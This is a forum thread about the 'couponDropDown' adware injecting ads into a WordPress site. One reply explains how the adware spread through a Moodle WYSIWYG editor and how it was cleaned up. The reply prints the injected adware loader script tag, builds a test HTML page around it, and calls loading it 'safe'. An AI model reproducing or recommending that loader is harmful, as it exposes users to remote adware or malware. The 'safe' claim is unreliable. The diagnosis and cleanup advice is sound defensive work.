Ad couponDropDown

I've got a problem concerning famous on-site ads malware, specifically Ad couponDropDown.

I'm aware that usually these ads are created via malware on computer, or as browser Add-on. However, my hard drive and my firefox, both are clean, but ads is still shown on particular website that I created a long time ago.

It is inserted between two divs as html tag with random generating class.

Site is running on wordpress with iThemes security (formerly better security) - with latest update and none high-risks issues. As I downloaded and updated plugin the ad itself disappeared, but left blank container and "ads by coupon | close" link.

For now I hid center tag via css.

I appreciate any response.

Link to site (it's in slovenian): http://www.grasshopper.si/

I had the same problem. Suddenly, a site I manage was full of banners from "couponDropDown". My problem was not about a local virus in my computer too.

Here is what i found, and how I solved it:

As I mentioned before, I manage a Moodle site where other users managed courses.
In two courses, managed by the same person, the couponDropDown nightmare appeared. But not in others. The problem was restricted to a certain courses from a certain person.
Obviously, it was content loaded by that person, but it was not obvious where it was.
After looking for a while, in the WYSIWYG editor, looking at the HTML source, some scripts tags having the following structure were found:
```
<p>Some HTML over here</p>
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=10368"></script>
```
All over the course, that script was found. This caused some iframes to be created, and some content from http://advertising-support.com/ to be loaded.
Finally, I just thought that the computer of the person managing those two courses was infected AND (here is the important thing) introducing that code in the editor without being noticed, and loading that script in the site. Those scripts finally loaded tons of banners and the like. Really smart.
SOLUTION: went all over those two courses content looking for the script loading from akamaihd.net.

I guess you may have had the same issue. Maybe you are using a WYSIWYG editor in your backend and that script is attached to the rest of the content without you noticing it.

You may analize your database looking for that script (and as of November 5 2014, it is still there :)

If you are curious, just C&P this code in a html file and load with your local server. With a developer tool, just surf the newly HTML introduced. You will se some iframes, objects loading falsh, some net traffic, and the like but no actual content is showed:

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf8">
    <title>couponDropDown test</title>
</head>
<body>
<p>Some HTML over here</p>
<script src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=10368"></script>
</body>

As an example, I think it is useful. And as far as I can say, it is safe! Hope it helps!